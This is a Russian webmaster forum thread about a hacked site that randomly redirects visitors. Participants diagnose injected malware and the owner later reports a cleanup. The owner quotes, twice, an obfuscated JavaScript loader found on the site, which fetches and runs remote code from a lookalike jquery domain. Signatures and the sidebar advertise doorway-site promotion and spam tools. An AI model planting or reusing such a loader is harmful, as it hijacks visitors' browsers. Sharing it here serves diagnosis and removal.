Редирект на "левые" сайты. Где искать проблему?
Страницы: 1
Редирект на "левые" сайты. Где искать проблему?
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл  .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

Тут глубже копать надо! Первый вопрос, который Вы должны себе задать: кто этот файлик  .htaccess подвравил до вас, что он стал редиректить на левые сайты, и каким образом это произошло. Причин может быть много. В любом случае такой симптом весьма тревожен. Я сталкивался пару раз с таким явлением и в моём случае  это был бэк дор и шелл вирусы. Что это за гадость и как с ней бороться почитайте в инете, инфы много. Лучше, конечно, специалисту по этим вопросам показаться. Свои сайты  я сам лечил, однако тут как в трипере. Не долечишь, и всё начинается снова))).
Цитата
Вадим Бардадым пишет:
иногда срабатывает переход на сторонние сайты
Иногда - это как? При каких условиях.
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Где отдохнуть? Куда поехать? Выбирай с нами
Цитата
Вадим Бардадым пишет:
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.
Давай за 150р реши твои проблемы с сайтом.
<p>Туры в Карпаты - дешево</p>
Скайп art_dsugar.
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник: 

Код
<script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
 
Пробовали удалить его с Алексей SP ( www.cy-pr.com/forum/f80/t52000/#100941 ). Не получилось, может кто подскажет как удалить или человека, который поможет.
Цитата
Coder пишет:
Иногда - это как? При каких условиях.
Условий как-таковых и нет. Переходит 1 раз за 5 кликов (примерно), в основном с главной страницы...
Цитата
Вадим Бардадым пишет:
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник:
Код
 <script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
  
Пробовали удалить его с Алексей SP [ www.cy-pr.com/forum/f80/t52000/#100941 ]. Не получилось, может кто подскажет как удалить или человека, который поможет.
Судя по коду у Вас полный триппер-букет в шаблоне WordPress ( wordpress.org/ )! Тут посмотрите: _www.site-security.ru/opisanie-raboty-skanera.html сканером. Sheel and Basic Backdoor Script Finder - в открытом доступе всем желающим можно скачать _www.site-security.ru/nash-pervyj-skaner.html
И следом почитать: _habrahabr.ru/company/sprinthost/blog/125839/ и взять на вооружение!
А откатить сайт из резервной копии не судьба? Вам за такие Редиректы Яндекс АГС воткнет... Ооо! И пароли смените после лечения!
Посмотреть конечно любопытно - пусть даже без денег! smile:)
ТС, то что у вас обнаружено может быть причной, но не источником заразы. Внешний не всегда можно что-либо сказать, поэтому внимательнее проверьте файлы сайта.
Если сами не справитесь стучите проверим сайт на все виды вирусов + дадим рекомендации!
Цитата
mylegnica пишет:
Судя по коду у Вас полный триппер-букет в шаблоне WordPress
У меня источником трипака явился тако же шаблон, только для Joomla. Частенько, если скачать шаблончик Бог весть откуда, можно намотать якусь гидоту.smile:) Два раза после лечения у меня случались рецидивы. Чуть до инфаркта не довели. Но когда на самом шаблоне нашёл замаскированный скрипт всё прекратилось.
ФУУУХ, НАКОНЕЦ!!!! Спасибо Всем кто участвовал, долго не мог удалить вредоносный код на сайте! После длительного поиска специалиста, нашел в сети Алексея ( skype - [SIZE=2]doktorsaitov)[/SIZE], Алексей справился с задачей на все 100%, проделал большую и кропотливую работу, источником заразы оказался плагин, причем были вкрапления в functions.php + пошел на встречу в плане цены, за что я ему очень благодарен! Рекомендую всем и буду обращаться сам!!!
Да...Кому нужна помощь, на этом форуме он находится по ссылке: www.cy-pr.com/people/114017/
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
10:06 Биржи ссылок и статей 2020 
10:02 Кейс по продвижению сайта в Яндексе с помощью поведенческого фактора 
09:58 Накрутка ПФ - сколько может стоить? 
09:56 Подскажите как отреагирую поисковики на не уникальный контент? 
09:54 CMS для сайта 
09:50 сколько стоит поднять тиц сайта? 
09:44 Что лучше изменить в дизайне? 
09:25 Крупные новостные (СМИ) площадки, Яндекс Новости, Google News, анонсы, хорошая посещаемость. 
20:16 Копирайтинг со знаком качества! 
16:27 Купоны на XEvil Xrumer скидка 55% + бонус + 6 месяцев абон.платы при покупке 
16:21 PROXY5.ru — Анонимные прокси дешево / IPv4 на 30 дней от 5$ 
15:54 SmmDrugs.ru - Дешевая накрутка в социальные сети 
12:24 Liteexchanger - Безопасный сервис для обмена 
11:54 Bat Cop — этому городу нужен надежный копирайтер! 
06:07 В/у, замена 
22:58 Партнерка UDS. Мобильное приложение для бизнеса . Программа лояльности 
17:30 [b]Webvork [/b]- международная товарная СРА сеть с сертифицированными офферами на Европу. 
13:27 Хотят купить сайт 
11:36 Private-Zone.Biz – Прорыв в монетизации файлового трафика, до 8р/инсталл, CPM от 4500 
11:33 Private-Zone.Biz – Прорыв в монетизации файлового трафика 
00:20 Подсчитана вероятность подхватить коронавирус на российских курортах